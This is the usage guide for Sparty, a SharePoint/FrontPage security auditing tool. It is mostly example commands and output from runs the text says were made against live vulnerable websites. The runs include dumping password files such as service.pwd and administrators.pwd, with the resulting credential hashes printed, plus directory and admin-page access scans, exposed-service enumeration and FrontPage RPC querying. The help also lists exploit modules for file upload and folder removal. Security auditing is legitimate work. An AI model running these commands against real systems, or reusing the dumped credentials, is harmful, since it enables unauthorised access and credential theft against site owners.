[*] Sparty - Usage Parameters and Help !

Note: All the examples presented in this documentation are tested against live websites (vulnerable and misconfigured). The URLs have been masked. For frontpage and sharepoint targets: http://target-front.com and http://target-share.com have been used.

# python sparty_beta_v_0.1.py -h
	---------------------------------------------------------------
                                                                 
          _|_|_|    _|_|_|     _|_|    _|_|_|    _|_|_|_|_|  _|      _|  
         _|        _|    _|  _|    _|  _|    _|      _|        _|  _|    
           _|_|    _|_|_|    _|_|_|_|  _|_|_|        _|          _|      
               _|  _|        _|    _|  _|    _|      _|          _|      
         _|_|_|    _|        _|    _|  _|    _|      _|          _|      

        SPARTY : Sharepoint/Frontpage Security Auditing Tool!
        Authored by: Aditya K Sood |{0kn0ck}@secniche.org  | 2013
        Twitter:     @AdityaKSood
        Powered by: IOActive Labs !
        
	--------------------------------------------------------------
Usage: sparty_beta_v_0.1.py [options]

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit

  Frontpage::
    -f FRONTPAGE, --frontpage=FRONTPAGE
                        <FRONTPAGE = pvt | bin> -- to check access permissions
                        on frontpage standard files in vti or bin directory!

  Sharepoint::
    -s SHAREPOINT, --sharepoint=SHAREPOINT
                        <SHAREPOINT = forms | layouts | catalog> -- to check
                        access permissions on sharepoint standard files in
                        forms or layouts or catalog directory!

  Mandatory::
    -u URL, --url=URL   target url to scan with proper structure

  Information Gathering and Exploit::
    -v FINGERPRINT, --http_fingerprint=FINGERPRINT
                        <FINGERPRINT = ms_sharepoint | ms_frontpage> --
                        fingerprint sharepoint or frontpage based on HTTP
                        headers!
    -d DUMP, --dump=DUMP
                        <DUMP = dump | extract> -- dump credentials from
                        default sharepoint and frontpage files (configuration
                        errors and exposed entries)!
    -l DIRECTORY, --list=DIRECTORY
                        <DIRECTORY = list | index> -- check directory listing
                        and permissions!
    -e EXPLOIT, --exploit=EXPLOIT
                        EXPLOIT = <rpc_version_check | rpc_service_listing |
                        rpc_file_upload | author_config_check |
                        author_remove_folder> -- exploit vulnerable
                        installations by checking RPC querying, service
                        listing and file uploading
    -i SERVICES, --services=SERVICES
                        SERVICES = <serv | services> -- checking exposed
                        services !

  General::
    -x EXAMPLES, --examples=EXAMPLES
                        running usage examples !

[*] Sharepoint/ Frontpage Version Fingerprinting !

# python sparty.py -v ms_frontpage -u http://www.target-front.com 

[+] extracting frontpage version from default file : (['"4.0.2.2717"']):

[+] frontpage fingerprinting module completed !

# python sparty.py -v ms_sharepoint -u https://www.target-share.com

[+] configured sharepoint version is  : (12.0.0.6211)
[-] sharepoint load balancing ability could not be determined using HTTP header : X-SharepointHealthScore !
[-] sharepoint diagnostics ability could not be determined using HTTP header : SPRequestGuid !

[+] sharepoint fingerprinting module completed !

[*] Dumping Passwords from Exposed Files !

# python sparty.py -d dump -u http://www.target-front.com 

[+]------------------------------------------------------------------------------------------------!
[+] dumping (service.pwd | authors.pwd | administrators.pwd | ws_ftp.log) files if possible!
[+]--------------------------------------------------------------------------------------------------!

[+] dumping contents of file located at : (http://www.target-front.com/_vti_pvt/service.pwd)

[+] dumping contents of file located at : (http://www.target-front.com/_vti_pvt/administrators.pwd)

[+] dumping contents of file located at : (http://www.target-front.com/_vti_pvt/authors.pwd)

[+] check the (__dump__.txt) file if generated !


[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden !

[+] (password dumping) - module executed successfully !

# cat __dump__.txt 
# -FrontPage-
target-front:Tagzan9yidZnI

# -FrontPage-
target-front:c/qfc.CTmiCAY

# -FrontPage-
target-front:c/qfc.CTmiCAY

[*] Indexing Check for Critical Directories !

# python sparty.py -l list -u http://www.target-front.com 

[+]-----------------------------------------------------------------------!
[+] auditing frontpage directory permissions (forbidden | index | not exist)!
[+]-------------------------------------------------------------------------!

[+] (http://www.target-front.com/_vti_pvt/) - (200)
[+] (http://www.target-front.com/_vti_bin/) - (200)
[+] (http://www.target-front.com/_vti_log/) - (200)
[+] (http://www.target-front.com/_vti_cnf/) - (200)
[-] (http://www.target-front.com/_vti_bot) - (404)
[+] (http://www.target-front.com/_vti_bin/_vti_adm) - (200)
[+] (http://www.target-front.com/_vti_bin/_vti_aut) - (200)
[+] (http://www.target-front.com/_vti_txt/) - (200)

[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden !

[+] (directory check) - module executed successfully !

[*] Scanning Access Rights on Frontpage Files (_vti_pvt and _vti_bin directories) !

# python sparty_beta_v_0.1.py -f pvt -u http://www.target-front.com
        
	--------------------------------------------------------------
[+] fetching information from the given target : (http://www.target-front.com)
[+] target responded with HTTP code: (200)
[+] target is running server: (YTS/1.20.28)

[+]---------------------------------------------------------!
[+] auditing '/_vti_pvt/' directory for sensitive information !
[+]-----------------------------------------------------------!

[+] (http://www.target-front.com/_vti_pvt/authors.pwd) - (200)
[+] (http://www.target-front.com/_vti_pvt/administrators.pwd) - (200)
[+] (http://www.target-front.com/_vti_pvt/users.pwd) - (200)
[+] (http://www.target-front.com/_vti_pvt/service.pwd) - (200)
[+] (http://www.target-front.com/_vti_pvt/service.grp) - (200)
[+] (http://www.target-front.com/_vti_pvt/bots.cnf) - (200)
[+] (http://www.target-front.com/_vti_pvt/service.cnf) - (200)
[+] (http://www.target-front.com/_vti_pvt/access.cnf) - (200)
[+] (http://www.target-front.com/_vti_pvt/writeto.cnf) - (200)
[-] (http://www.target-front.com/_vti_pvt/botsinf.cnf) - (404)
[+] (http://www.target-front.com/_vti_pvt/doctodep.btr) - (200)
[+] (http://www.target-front.com/_vti_pvt/deptodoc.btr) - (200)
[+] (http://www.target-front.com/_vti_pvt/linkinfo.cnf) - (200)
[-] (http://www.target-front.com/_vti_pvt/services.org) - (404)
[-] (http://www.target-front.com/_vti_pvt/structure.cnf) - (404)
[+] (http://www.target-front.com/_vti_pvt/svcacl.cnf) - (200)
[-] (http://www.target-front.com/_vti_pvt/uniqperm.cnf) - (404)
[-] (http://www.target-front.com/_vti_pvt/service/lck) - (404)
[+] (http://www.target-front.com/_vti_pvt/frontpg.lck) - (200)

[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden ! (500) - Server Error

[+] (pvt file access) - module executed successfully !

[*] Scanning Access Rights on Sharepoint Files (forms, layouts and catalogs directories) !

# python sparty.py -s layouts -u http://www.target-share.com

[+]-----------------------------------------------------------------!
[+] auditing sharepoint '/_layouts/' directory for access permissions !
[+]-------------------------------------------------------------------!

[+] (http://www.target-share.com/_layouts/aclinv.aspx) - (200)
[+] (http://www.target-share.com/_layouts/addrole.aspx) - (200)
[+] (http://www.target-share.com/_layouts/AdminRecycleBin.aspx) - (200)
[+] (http://www.target-share.com/_layouts/AreaNavigationSettings.aspx) - (200)
[+] (http://www.target-share.com/_Layouts/AreaTemplateSettings.aspx) - (200)
[+] (http://www.target-share.com/_Layouts/AreaWelcomePage.aspx) - (200)
[+] (http://www.target-share.com/_layouts/associatedgroups.aspx) - (200)
[+] (http://www.target-share.com/_layouts/bpcf.aspx) - (200)
[+] (http://www.target-share.com/_Layouts/ChangeSiteMasterPage.aspx) - (200)
[+] (http://www.target-share.com/_layouts/create.aspx) - (200)
[+] (http://www.target-share.com/_layouts/editgrp.aspx) - (200)
[+] (http://www.target-share.com/_layouts/editprms.aspx) - (200)
[+] (http://www.target-share.com/_layouts/groups.aspx) - (200)
[+] (http://www.target-share.com/_layouts/help.aspx) - (200)
[-] (http://www.target-share.com/_layouts/images/) - (403)
[+] (http://www.target-share.com/_layouts/listedit.aspx) - (200)
[+] (http://www.target-share.com/_layouts/ManageFeatures.aspx) - (200)
[+] (http://www.target-share.com/_layouts/ManageFeatures.aspx) - (200)
[+] (http://www.target-share.com/_layouts/mcontent.aspx) - (200)
[+] (http://www.target-share.com/_layouts/mngctype.aspx) - (200)
[+] (http://www.target-share.com/_layouts/mngfield.aspx) - (200)
[+] (http://www.target-share.com/_layouts/mngsiteadmin.aspx) - (200)
[+] (http://www.target-share.com/_layouts/mngsubwebs.aspx) - (200)
[+] (http://www.target-share.com/_layouts/mngsubwebs.aspx?view=sites) - (200)
[+] (http://www.target-share.com/_layouts/mobile/mbllists.aspx) - (200)
[+] (http://www.target-share.com/_layouts/MyInfo.aspx) - (200)
[+] (http://www.target-share.com/_layouts/MyPage.aspx) - (200)
[+] (http://www.target-share.com/_layouts/MyTasks.aspx) - (200)
[+] (http://www.target-share.com/_layouts/navoptions.aspx) - (200)
[+] (http://www.target-share.com/_layouts/NewDwp.aspx) - (200)
[+] (http://www.target-share.com/_layouts/newgrp.aspx) - (200)
[+] (http://www.target-share.com/_layouts/newsbweb.aspx) - (200)
[+] (http://www.target-share.com/_layouts/PageSettings.aspx) - (200)
[+] (http://www.target-share.com/_layouts/people.aspx) - (200)
[+] (http://www.target-share.com/_layouts/people.aspx?MembershipGroupId=0) - (200)
[+] (http://www.target-share.com/_layouts/permsetup.aspx) - (200)
[+] (http://www.target-share.com/_layouts/picker.aspx) - (200)
[+] (http://www.target-share.com/_layouts/policy.aspx) - (200)
[+] (http://www.target-share.com/_layouts/policyconfig.aspx) - (200)
[+] (http://www.target-share.com/_layouts/policycts.aspx) - (200)
[+] (http://www.target-share.com/_layouts/Policylist.aspx) - (200)
[+] (http://www.target-share.com/_layouts/prjsetng.aspx) - (200)
[+] (http://www.target-share.com/_layouts/quiklnch.aspx) - (200)
[+] (http://www.target-share.com/_layouts/recyclebin.aspx) - (200)
[+] (http://www.target-share.com/_Layouts/RedirectPage.aspx) - (200)
[+] (http://www.target-share.com/_layouts/role.aspx) - (200)
[+] (http://www.target-share.com/_layouts/settings.aspx) - (200)
[+] (http://www.target-share.com/_layouts/SiteDirectorySettings.aspx) - (200)
[+] (http://www.target-share.com/_layouts/sitemanager.aspx) - (200)
[+] (http://www.target-share.com/_layouts/SiteManager.aspx?lro=all) - (200)
[+] (http://www.target-share.com/_layouts/spcf.aspx) - (200)
[+] (http://www.target-share.com/_layouts/storman.aspx) - (200)
[+] (http://www.target-share.com/_layouts/themeweb.aspx) - (200)
[+] (http://www.target-share.com/_layouts/topnav.aspx) - (200)
[+] (http://www.target-share.com/_layouts/user.aspx) - (200)
[+] (http://www.target-share.com/_layouts/userdisp.aspx) - (200)
[+] (http://www.target-share.com/_layouts/userdisp.aspx?ID=1) - (200)
[+] (http://www.target-share.com/_layouts/useredit.aspx) - (200)
[+] (http://www.target-share.com/_layouts/useredit.aspx?ID=1) - (200)
[+] (http://www.target-share.com/_layouts/viewgrouppermissions.aspx) - (200)
[+] (http://www.target-share.com/_layouts/viewlsts.aspx) - (200)
[+] (http://www.target-share.com/_layouts/vsubwebs.aspx) - (200)
[+] (http://www.target-share.com/_layouts/WPPrevw.aspx?ID=247) - (200)
[+] (http://www.target-share.com/_layouts/wrkmng.aspx) - (200)

[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden !

[+] (layout file access) - module executed successfully !

[*] Exposed Services Check !

# python sparty.py -i services -u https://www.target-share.com


[+]------------------------------------------------------!
[+] checking exposed services in the frontpage/sharepoint  directory!
[+]------------------------------------------------------!

[-] (https://www.target-share.com/_vti_bin/Admin.asmx) - (404)
[+] (https://www.target-share.com/_vti_bin/alerts.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/dspsts.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/forms.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/Lists.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/people.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/Permissions.asmx) - (200)
[-] (https://www.target-share.com/_vti_bin/search.asmx) - (404)
[+] (https://www.target-share.com/_vti_bin/UserGroup.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/versions.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/Views.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/webpartpages.asmx) - (200)
[+] (https://www.target-share.com/_vti_bin/webs.asmx) - (200)
[-] (https://www.target-share.com/_vti_bin/spsdisco.aspx) - (404)
[-] (https://www.target-share.com/_vti_bin/AreaService.asmx) - (404)
[-] (https://www.target-share.com/_vti_bin/BusinessDataCatalog.asmx) - (404)
[-] (https://www.target-share.com/_vti_bin/ExcelService.asmx) - (404)
[+] (https://www.target-share.com/_vti_bin/SharepointEmailWS.asmx) - (200)
[-] (https://www.target-share.com/_vti_bin/spscrawl.asmx) - (404)
[+] (https://www.target-share.com/_vti_bin/spsearch.asmx) - (200)
[-] (https://www.target-share.com/_vti_bin/UserProfileService.asmx) - (404)
[+] (https://www.target-share.com/_vti_bin/WebPartPages.asmx) - (200)

[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden !

[+] (exposed services check) - module executed successfully !

[*] Frontpage RPC Querying !

# python sparty.py -e rpc_version_check -u https://www.target-front.com

[+]-----------------------------------------------------------------------!
[+] auditing frontpage RPC service                                          !
[+]-------------------------------------------------------------------------!

[+] Sending HTTP GET request to - (https://www.target-front.com/_vti_bin/shtml.exe/_vti_rpc) for verifying whether RPC is listening !
[+] target is listening on frontpage RPC - (200) !

[+] Sending HTTP POST request to retrieve software version - (https://www.target-front.com/_vti_bin/shtml.exe/_vti_rpc)
[+] target accepts the request - (method= server version) | (200) !

<html><head><title>vermeer RPC packet</title></head>

<body>

<p>method= server version:5.0.2.2634

<p>status=

<ul>

<li>status=917506

<li>osstatus=0

<li>msg=The method ' server version' is not recognized.

<li>osmsg=

</ul>

</body>

</html>

[*] ---------------------------------------------------------------------------------------
[+] Sending HTTP GET request to - (https://www.target-front.com/_vti_bin/shtml.dll/_vti_rpc) for verifying whether RPC is listening !
[-] server responds with bad status !
[+] Sending HTTP POST request to retrieve software version - (https://www.target-front.com/_vti_bin/shtml.dll/_vti_rpc)
[-] server responds with bad status !
[*] ---------------------------------------------------------------------------------------

[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden !

[+] (module RPC check) - module executed successfully !

[*] Frontpage - Service Listing !

# python sparty_beta_v_0.1.py -e rpc_service_listing -u http://www.target-front.com
        
	--------------------------------------------------------------
[+] fetching information from the given target : (http://www.target-front.com)
[+] target responded with HTTP code: (200)
[+] target is running server: (Apache/2.2.3 (Red Hat))

[+]-----------------------------------------------------------------------!
[+] auditing frontpage RPC service for fetching listing                     !
[+]-------------------------------------------------------------------------!

[+] Sending HTTP POST request to retrieve service listing  - (http://www.target-front.com/_vti_bin/shtml.exe/_vti_rpc)
[+] target accepts the request - (method=list+services:3.0.2.1076&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:3.0.2.1076&service_name=.html) 

[+] target accepts the request - (method=list+services:4.0.2.471&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:4.0.2.471&service_name=.html) 

[+] target accepts the request - (method=list+services:4.0.2.0000&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:4.0.2.0000&service_name=.html) 

[+] target accepts the request - (method=list+services:5.0.2.4803&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:5.0.2.4803&service_name=.html) 

[+] target accepts the request - (method=list+services:5.0.2.2623&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:5.0.2.2623&service_name=.html) 

[+] target accepts the request - (method=list+services:6.0.2.5420&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:6.0.2.5420&service_name=.html) 

[*] ---------------------------------------------------------------------------------------
[+] Sending HTTP POST request to retrieve service listing  - (http://www.target-front.com/_vti_bin/shtml.dll/_vti_rpc)
[-] server responds with bad status !
[*] ---------------------------------------------------------------------------------------

[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden ! (500) - Server Error

[+] (module RPC service listing check) - module executed successfully !


# cat __service-list__.txtmethod\=list+services\:3.0.2.1076\&service_name\=.html 
<html><head><title>vermeer RPC packet</title></head>
<body>
<p>method=list services:3.0.2.1076
<p>services_list=
<ul>
<ul>
<li>service_name=
<li>meta_info=
<ul>
<li>vti_restartmanual
<li>IX|0
<li>vti_featurelist

--- Truncated
HTML Output !
---

(C) Aditya K Sood , 2013